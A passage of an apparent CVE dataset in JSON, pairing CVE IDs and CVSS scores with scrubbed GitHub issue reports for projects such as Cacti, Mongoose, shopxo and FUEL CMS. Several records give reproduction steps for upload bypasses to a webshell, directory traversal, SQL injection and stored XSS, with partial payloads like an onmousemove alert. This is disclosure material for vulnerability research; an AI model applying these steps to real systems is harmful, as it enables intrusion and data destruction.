  57897. "description": "heap use after free at APITAG accessor.h in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap use after free at APITAG APITAG in APITAG Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG CFLAGS=\" fsanitize=address,undefined g\" CXXFLAGS=\" fsanitize=address,undefined g\" ./configure disable openmp APITAG",
  57898. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57899. "severity": "MEDIUM",
  57900. "baseScore": 5.5,
  57901. "impactScore": 3.6,
  57902. "exploitabilityScore": 1.8
  57903. },
  57904. {
  57905. "CVE_ID": "CVE-2020-25706",
  57906. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3723",
  57907. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3723",
  57908. "Repo_new": "cacti/cacti",
  57909. "Issue_Created_At": "2020-07-24T13:25:27Z",
  57910. "description": "the XSS issue has been found on FILETAG APITAG NUMBERTAG The vulnerability could be exploited by an attacker by forcing a user to upload a file with a \"name\" or \"xml_path\" containing client side code. FILETAG FILETAG FILETAG",
  57911. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  57912. "severity": "MEDIUM",
  57913. "baseScore": 6.1,
  57914. "impactScore": 2.7,
  57915. "exploitabilityScore": 2.8
  57916. },
  57917. {
  57918. "CVE_ID": "CVE-2020-25750",
  57919. "Issue_Url_old": "https://github.com/DevGroup-ru/dotplant2/issues/400",
  57920. "Issue_Url_new": "https://github.com/devgroup-ru/dotplant2/issues/400",
  57921. "Repo_new": "devgroup-ru/dotplant2",
  57922. "Issue_Created_At": "2020-09-13T13:11:04Z",
  57923. "description": "XXE Vulnerability. In class APITAG PATHTAG ), there is an XXE vulnerability in APITAG function. ERRORTAG The user input($_POST['xml']) has been put into simplexml_load_string without sanitation. Although this parser does not print anything, attackers could also use blind XXE to get sensitive information. You could use APITAG to avoid this vulnerability. Thx",
  57924. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57925. "severity": "HIGH",
  57926. "baseScore": 7.5,
  57927. "impactScore": 3.6,
  57928. "exploitabilityScore": 3.9
  57929. },
  57930. {
  57931. "CVE_ID": "CVE-2020-25756",
  57932. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1135",
  57933. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1135",
  57934. "Repo_new": "cesanta/mongoose",
  57935. "Issue_Created_At": "2020-08-12T22:11:29Z",
  57936. "description": "A buffer overflow error in mg_get_http_header. A buffer overflow error in mg_get_http_header function in PATHTAG in Mongoose NUMBERTAG where header_names and header_values have a bound of (MG_MAX_HTTP_HEADERS); however, there is no check to ensure that the loop does not exceed the upper bound. A Maliciously crafted http header can trigger this bug. To fix it, modify the loop condition into: for (i NUMBERTAG i < MG_MAX_HTTP_HEADERS && hm >header_names[i].len NUMBERTAG i++)",
  57937. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57938. "severity": "CRITICAL",
  57939. "baseScore": 9.8,
  57940. "impactScore": 5.9,
  57941. "exploitabilityScore": 3.9
  57942. },
  57943. {
  57944. "CVE_ID": "CVE-2020-25790",
  57945. "Issue_Url_old": "https://github.com/Typesetter/Typesetter/issues/674",
  57946. "Issue_Url_new": "https://github.com/typesetter/typesetter/issues/674",
  57947. "Repo_new": "typesetter/typesetter",
  57948. "Issue_Created_At": "2020-09-18T17:44:24Z",
  57949. "description": "Bypass File upload leads to Command execution. Hello all, I was testing the upload mechanism, and I found that it is possible to bypass the protection for .php files by placing the .php inside a .zip file and extracting it. Once this is done, it is possible to execute commands on the machine using a malicious php file (webshell). Okay, that and the viability decreased a little because it is an admin functionality, however, if it is not allowed to upload a .php file, then placing the same file inside a .zip and extracting and executing it should also not be allowed . Steps to reproduce NUMBERTAG As admin go to Content menu and click on Uploaded files NUMBERTAG Inside the try to upload a .php file, and NUMBERTAG try to upload a .php file directly, check that it is not possible NUMBERTAG Take the same .php file and place it in a .zip and upload it NUMBERTAG Extract through functionality and open the .php file Obs : A strange behavior was that, after extracting the PHP file in functionality, it is seen as HTML. APITAG ==> Executing Commands FILETAG ==> Try to upload a .php direct FILETAG",
  57950. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  57951. "severity": "HIGH",
  57952. "baseScore": 7.2,
  57953. "impactScore": 5.9,
  57954. "exploitabilityScore": 1.2
  57955. },
  57956. {
  57957. "CVE_ID": "CVE-2020-25791",
  57958. "Issue_Url_old": "https://github.com/bodil/sized-chunks/issues/11",
  57959. "Issue_Url_new": "https://github.com/bodil/sized-chunks/issues/11",
  57960. "Repo_new": "bodil/sized-chunks",
  57961. "Issue_Created_At": "2020-09-06T22:04:56Z",
  57962. "description": "Multiple soundness issues in Chunk and APITAG Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. Description Chunk: Array size is not checked when constructed with APITAG and APITAG . Array size is not checked when constructed with APITAG . Clone and APITAG are not panic safe; A panicking iterator causes memory safety issues with them. APITAG Generates unaligned references for types with a large alignment requirement. Demonstration Crate: sized chunks Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG Cargo flags: release ERRORTAG Output: ERRORTAG Return Code NUMBERTAG",
  57963. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57964. "severity": "HIGH",
  57965. "baseScore": 7.5,
  57966. "impactScore": 3.6,
  57967. "exploitabilityScore": 3.9
  57968. },
  57969. {
  57970. "CVE_ID": "CVE-2020-25821",
  57971. "Issue_Url_old": "https://github.com/jgm/peg-markdown/issues/43",
  57972. "Issue_Url_new": "https://github.com/jgm/peg-markdown/issues/43",
  57973. "Repo_new": "jgm/peg-markdown",
  57974. "Issue_Created_At": "2020-09-21T10:01:11Z",
  57975. "description": "NULL pointer dereference in the APITAG function. Hi, While fuzzing peg markdown with Honggfuzz, I found a NULL pointer dereference in the APITAG function. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  57976. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57977. "severity": "HIGH",
  57978. "baseScore": 7.5,
  57979. "impactScore": 3.6,
  57980. "exploitabilityScore": 3.9
  57981. },
  57982. {
  57983. "CVE_ID": "CVE-2020-25825",
  57984. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6605",
  57985. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6605",
  57986. "Repo_new": "octopusdeploy/issues",
  57987. "Issue_Created_At": "2020-10-05T22:30:33Z",
  57988. "description": "Bash scripts can reveal sensitive variable values NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  57989. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57990. "severity": "HIGH",
  57991. "baseScore": 7.5,
  57992. "impactScore": 3.6,
  57993. "exploitabilityScore": 3.9
  57994. },
  57995. {
  57996. "CVE_ID": "CVE-2020-25825",
  57997. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6606",
  57998. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6606",
  57999. "Repo_new": "octopusdeploy/issues",
  58000. "Issue_Created_At": "2020-10-05T22:32:55Z",
  58001. "description": "Bash scripts can reveal sensitive variable values NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  58002. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58003. "severity": "HIGH",
  58004. "baseScore": 7.5,
  58005. "impactScore": 3.6,
  58006. "exploitabilityScore": 3.9
  58007. },
  58008. {
  58009. "CVE_ID": "CVE-2020-25825",
  58010. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6604",
  58011. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6604",
  58012. "Repo_new": "octopusdeploy/issues",
  58013. "Issue_Created_At": "2020-10-05T22:27:43Z",
  58014. "description": "Bash scripts can reveal sensitive variable values. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description Bash scripts, when configured in a certain way, can reveal reveal enough information to determine sensitive variable values in task logs. Other script types are not affected. Affected versions Octopus Server NUMBERTAG Links CVE: [ CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
  58015. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58016. "severity": "HIGH",
  58017. "baseScore": 7.5,
  58018. "impactScore": 3.6,
  58019. "exploitabilityScore": 3.9
  58020. },
  58021. {
  58022. "CVE_ID": "CVE-2020-25825",
  58023. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6607",
  58024. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6607",
  58025. "Repo_new": "octopusdeploy/issues",
  58026. "Issue_Created_At": "2020-10-05T22:34:11Z",
  58027. "description": "Bash scripts can reveal sensitive variable values NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  58028. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58029. "severity": "HIGH",
  58030. "baseScore": 7.5,
  58031. "impactScore": 3.6,
  58032. "exploitabilityScore": 3.9
  58033. },
  58034. {
  58035. "CVE_ID": "CVE-2020-25872",
  58036. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/34",
  58037. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/34",
  58038. "Repo_new": "philippe/frogcms",
  58039. "Issue_Created_At": "2020-09-14T17:17:47Z",
  58040. "description": "APITAG Directory Traversal Vulnerability. There is a directory traversal vulnerability when logined as a admin and view the uploaded files.An attacker can read arbitrarily file on a remote server via GET request urlencode parameter. APITAG FILETAG . APITAG FILETAG APITAG FILETAG . APITAG FILETAG",
  58041. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  58042. "severity": "MEDIUM",
  58043. "baseScore": 4.9,
  58044. "impactScore": 3.6,
  58045. "exploitabilityScore": 1.2
  58046. },
  58047. {
  58048. "CVE_ID": "CVE-2020-25873",
  58049. "Issue_Url_old": "https://github.com/baijiacms/baijiacmsV4/issues/6",
  58050. "Issue_Url_new": "https://github.com/baijiacms/baijiacmsv4/issues/6",
  58051. "Repo_new": "baijiacms/baijiacmsv4",
  58052. "Issue_Created_At": "2020-09-19T08:11:29Z",
  58053. "description": "APITAG directory traversal vulnerability. Directory traversal vulnerability in APITAG allows remote authenticated attackers to delete arbitrary folders on the server via unspecified vectors. Vulnerable code is in PATHTAG CODETAG The origin request is APITAG ,which is used to delete database backuped folder.We can change the parameter \"id\" to delete any folders. For example NUMBERTAG Create a folder named test FILETAG NUMBERTAG Base NUMBERTAG encode PATHTAG FILETAG NUMBERTAG Change the parameter id to APITAG and request this url \" URLTAG \" FILETAG NUMBERTAG Now the test folder is deleted. FILETAG NUMBERTAG An authenticated attacker can destroy the whole website just use the parameter PATHTAG after base NUMBERTAG encode.",
  58054. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  58055. "severity": "MEDIUM",
  58056. "baseScore": 6.5,
  58057. "impactScore": 3.6,
  58058. "exploitabilityScore": 2.8
  58059. },
  58060. {
  58061. "CVE_ID": "CVE-2020-25875",
  58062. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/4",
  58063. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/4",
  58064. "Repo_new": "r0ck3t1973/xss_payload",
  58065. "Issue_Created_At": "2020-09-15T04:18:12Z",
  58066. "description": "Cross Site Script Vulnerability on \"UI Elments\" in Codoforum feature NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click smileys NUMBERTAG Choese smileys >> Click Edit NUMBERTAG Insert Payload APITAG Code': '> APITAG NUMBERTAG Click Save NUMBERTAG Go to Page PATHTAG NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Chose smiley FILETAG NUMBERTAG insert payload FILETAG NUMBERTAG ss alert mess FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58067. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58068. "severity": "MEDIUM",
  58069. "baseScore": 5.4,
  58070. "impactScore": 2.7,
  58071. "exploitabilityScore": 2.3
  58072. },
  58073. {
  58074. "CVE_ID": "CVE-2020-25876",
  58075. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/3",
  58076. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/3",
  58077. "Repo_new": "r0ck3t1973/xss_payload",
  58078. "Issue_Created_At": "2020-09-15T03:10:06Z",
  58079. "description": "Cross Site Script Vulnerability on APITAG in Codoforum feature NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Add Page NUMBERTAG Insert Payload in APITAG Title': '> APITAG NUMBERTAG Click Save NUMBERTAG Go to Page PATHTAG NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Add Pages FILETAG NUMBERTAG ss Message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58080. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58081. "severity": "MEDIUM",
  58082. "baseScore": 5.4,
  58083. "impactScore": 2.7,
  58084. "exploitabilityScore": 2.3
  58085. },
  58086. {
  58087. "CVE_ID": "CVE-2020-25877",
  58088. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/401",
  58089. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/401",
  58090. "Repo_new": "blackcatdevelopment/blackcatcms",
  58091. "Issue_Created_At": "2020-09-17T04:53:17Z",
  58092. "description": "Cross Site Script Vulnerability on APITAG in APITAG CMS NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Page\" feature in Admin To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Page NUMBERTAG Insert Payload in APITAG '> APITAG NUMBERTAG Click APITAG Page NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG insert payload FILETAG NUMBERTAG ss alert message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58093. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58094. "severity": "MEDIUM",
  58095. "baseScore": 5.4,
  58096. "impactScore": 2.7,
  58097. "exploitabilityScore": 2.3
  58098. },
  58099. {
  58100. "CVE_ID": "CVE-2020-25878",
  58101. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/402",
  58102. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/402",
  58103. "Repo_new": "blackcatdevelopment/blackcatcms",
  58104. "Issue_Created_At": "2020-09-18T01:32:54Z",
  58105. "description": "Cross Site Script Vulnerability on APITAG Tools\" in APITAG CMS NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Tools\" feature in Admin To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Chose: +/ APITAG CMS Output Filters: PATHTAG +/ Droplets: PATHTAG NUMBERTAG Insert Payload '> APITAG \"> APITAG NUMBERTAG Save NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG APITAG CMS Output Filters: PATHTAG FILETAG FILETAG FILETAG NUMBERTAG Droplets: PATHTAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58106. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  58107. "severity": "MEDIUM",
  58108. "baseScore": 4.8,
  58109. "impactScore": 2.7,
  58110. "exploitabilityScore": 1.7
  58111. },
  58112. {
  58113. "CVE_ID": "CVE-2020-25879",
  58114. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/5",
  58115. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/5",
  58116. "Repo_new": "r0ck3t1973/xss_payload",
  58117. "Issue_Created_At": "2020-09-22T07:40:45Z",
  58118. "description": "Cross Site Script Vulnerability on APITAG in Codoforum feature NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Users\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Edit Username Insert Payload \"> APITAG NUMBERTAG Click Save NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Edit Username FILETAG NUMBERTAG ss alert mess FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
  58119. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58120. "severity": "MEDIUM",
  58121. "baseScore": 5.4,
  58122. "impactScore": 2.7,
  58123. "exploitabilityScore": 2.3
  58124. },
  58125. {
  58126. "CVE_ID": "CVE-2020-25881",
  58127. "Issue_Url_old": "https://github.com/AubreyJun/cms/issues/2",
  58128. "Issue_Url_new": "https://github.com/aubreyjun/cms/issues/2",
  58129. "Repo_new": "aubreyjun/cms",
  58130. "Issue_Created_At": "2020-09-15T10:19:11Z",
  58131. "description": "There is a directory traversal vulnerability at attachment deletion NUMBERTAG Deploy the RKCMS locally NUMBERTAG Create a file, such as FILETAG FILETAG NUMBERTAG Log in the application NUMBERTAG Delete a attachment\uff0capture this packet ,change the filename parameter to PATHTAG this request FILETAG FILETAG NUMBERTAG FILETAG was deleted FILETAG NUMBERTAG The source code for this function is in FILETAG FILETAG NUMBERTAG filename parameter does not have any filtering FILETAG",
  58132. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  58133. "severity": "MEDIUM",
  58134. "baseScore": 5.5,
  58135. "impactScore": 3.6,
  58136. "exploitabilityScore": 1.8
  58137. },
  58138. {
  58139. "CVE_ID": "CVE-2020-25911",
  58140. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/15237",
  58141. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/15237",
  58142. "Repo_new": "modxcms/revolution",
  58143. "Issue_Created_At": "2020-09-16T14:33:59Z",
  58144. "description": "XXE Vulnerability. Firstly, the website of the security vulnerability report does not work, so I have to report the problem here. There is a very serious XXE vulnerability in PATHTAG which could lead to sensitive information leakage or APITAG attack. In function APITAG , the user input is parsed directly without any sanitation. When the content type is APITAG , it will lead to XXE attack. ERRORTAG",
  58145. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  58146. "severity": "CRITICAL",
  58147. "baseScore": 9.1,
  58148. "impactScore": 5.2,
  58149. "exploitabilityScore": 3.9
  58150. },
  58151. {
  58152. "CVE_ID": "CVE-2020-25912",
  58153. "Issue_Url_old": "https://github.com/symphonycms/symphonycms/issues/2924",
  58154. "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2924",
  58155. "Repo_new": "symphonycms/symphonycms",
  58156. "Issue_Created_At": "2020-09-21T02:52:43Z",
  58157. "description": "XXE Vulnerability. FILETAG public static function APITAG $xml) { $doc = new APITAG 'utf NUMBERTAG doc APITAG return APITAG $doc); } Crafted user input could lead to XXE vulnerability as the external entity is not disabled here.",
  58158. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  58159. "severity": "CRITICAL",
  58160. "baseScore": 9.1,
  58161. "impactScore": 5.2,
  58162. "exploitabilityScore": 3.9
  58163. },
  58164. {
  58165. "CVE_ID": "CVE-2020-26007",
  58166. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/48",
  58167. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/48",
  58168. "Repo_new": "gongfuxiang/shopxo",
  58169. "Issue_Created_At": "2020-09-21T12:31:22Z",
  58170. "description": "There are some vulnerabilities in the upload payment plugin can get webshell. When uploading payment plug ins, attackers can bypass file verification and upload malicious php files by constructing the code of the php file in the zip compression package. Even uploading the php file without constructing the code will trigger the file containment vulnerability or upload files through competitive upload In the Upload method in the PATHTAG file, the file_put_contents function parameter is controllable FILETAG But later call APITAG method to do file verification, if the file verification is not passed, the file will be deleted In the APITAG method, the class_exists function checks whether the class is defined, the class uses the fully qualified name, and then it checks whether there are three methods defined in the class FILETAG According to this, the attacker only needs to define a class in the PHP file, define the namespace, and define the three methods mentioned above in order to pass the verification. The complete code is as follows: ERRORTAG Finally, the method is called in PATHTAG FILETAG After logging in to the background, upload the zip package containing FILETAG at the site management > payment method > upload FILETAG Visit PATHTAG FILETAG Not by constructing code: The first is file inclusion. The class_exists function will call the autoload function by default. The definition of the autoload function is found in PATHTAG FILETAG APITAG is the function of thinkphp to find files. It is mainly loaded through psr NUMBERTAG and classmap. The fully qualified name of the class we passed in is returned by the APITAG function and finally spliced into the complete file path. FILETAG Finally, the autoload function calls the __include_file function, and this function directly performs the file include operation FILETAG At this point, we have not entered the following file deletion operation but included the file, and the code will also be executed. Upload the zip archive containing the php file at the same location, the code content is: APITAG Although the upload failed message is returned after uploading, the code has been included and executed The file is created in FILETAG under the root directory of shopxo installation, visit FILETAG FILETAG There are also problems with uploading files and then deleting files. If there is no file included here, there is another way to upload files is competitive upload, because there is a time difference from file verification to file deletion, and you can keep uploading while keeping access. I use burpsuite's intruder module to keep sending packages and python scripts to keep accessing FILETAG The Python script is as follows: APITAG Upload the php file in the compressed package as follows: APITAG The generated php file is in the extend\\payment directory Visit PATHTAG FILETAG",
  58171. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58172. "severity": "HIGH",
  58173. "baseScore": 7.8,
  58174. "impactScore": 5.9,
  58175. "exploitabilityScore": 1.8
  58176. },
  58177. {
  58178. "CVE_ID": "CVE-2020-26008",
  58179. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/47",
  58180. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/47",
  58181. "Repo_new": "gongfuxiang/shopxo",
  58182. "Issue_Created_At": "2020-09-21T11:50:48Z",
  58183. "description": "There is a File upload vulnerability that can getshell. The file upload vulnerability here lies in the blacklist method used when verifying the suffix of the uploaded file. This verification method is not strict and is often bypassed by attackers in various ways The APITAG method in the PATHTAG file has a file creation operation, in which the input of the file_put_contents function is controllable FILETAG Line NUMBERTAG checks the file suffix name, here is the blacklist check FILETAG The value in the private static variable $exclude_ext is \u2018.php\u2019, which can easily be bypassed FILETAG There are many ways to bypass the blacklist verification of suffix names. Taking my local Windows system environment as an example, you can upload file names that do not conform to the Windows file naming rules APITAG The windows system will automatically remove the content behind the symbols that do not conform to the rules. You can change the file suffix in the linux environment and upload it to the website Through the audit of the APITAG method in the FILETAG file When the zip archive does not match the resource directory, it will jump out of the loop of reading the archive file FILETAG FILETAG FILETAG And the resource directory cannot be _controller_, because the directory corresponding to _controller_ exists, and the compressed package will be closed directly without entering the subsequent file writing operation FILETAG Finally, the method is called in the Upload method of the PATHTAG file FILETAG The attacker can upload such a compressed package after logging into the background system FILETAG And upload the compressed package at Application Center > Application Management > Upload Application FILETAG Visit PATHTAG FILETAG In PATHTAG there is also the same blacklist verification problem for uploaded files FILETAG The processing logic is very similar to the above file After logging in to the system, upload the zip archive at the site management > theme management > theme installation FILETAG Visit PATHTAG after uploading FILETAG",
  58184. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58185. "severity": "HIGH",
  58186. "baseScore": 7.8,
  58187. "impactScore": 5.9,
  58188. "exploitabilityScore": 1.8
  58189. },
  58190. {
  58191. "CVE_ID": "CVE-2020-26045",
  58192. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/575",
  58193. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/575",
  58194. "Repo_new": "daylightstudio/fuel-cms",
  58195. "Issue_Created_At": "2020-09-23T07:57:39Z",
  58196. "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'name' in PATHTAG FUEL CMS NUMBERTAG allows SQL Injection via parameter 'name' in PATHTAG Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. FILETAG payload: a\")or APITAG Poc: POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Origin: URLTAG Connection: close Referer: URLTAG Cookie: APITAG APITAG APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Pragma: no cache Cache Control: no cache NUMBERTAG Content Disposition: form data; name=\"description\" adsf NUMBERTAG Content Disposition: form data; name=\"name\" a\")or APITAG NUMBERTAG Content Disposition: form data; name=\"exists_users NUMBERTAG Content Disposition: form data; name=\"other_perms FILETAG",
  58197. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58198. "severity": "CRITICAL",
  58199. "baseScore": 9.8,
  58200. "impactScore": 5.9,
  58201. "exploitabilityScore": 3.9
  58202. },
  58203. {
  58204. "CVE_ID": "CVE-2020-26046",
  58205. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/574",
  58206. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/574",
  58207. "Repo_new": "daylightstudio/fuel-cms",
  58208. "Issue_Created_At": "2020-09-23T07:36:11Z",
  58209. "description": "Stored XSS in PATHTAG Variables NUMBERTAG Stored xss in Blocks name FILETAG Refresh the page, it will trigger below APITAG Viewed\" menu FILETAG Front page\uff1a FILETAG payload: \"onmousemove=\"alert NUMBERTAG Stored xss in Navigation Label FILETAG FILETAG payload: APITAG NUMBERTAG Stored xss in Site Variables Name FILETAG FILETAG payload: \"onmousemove=\"alert(/site/)",
  58210. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58211. "severity": "MEDIUM",
  58212. "baseScore": 5.4,
  58213. "impactScore": 2.7,
  58214. "exploitabilityScore": 2.3
  58215. },
  58216. {
  58217. "CVE_ID": "CVE-2020-26048",
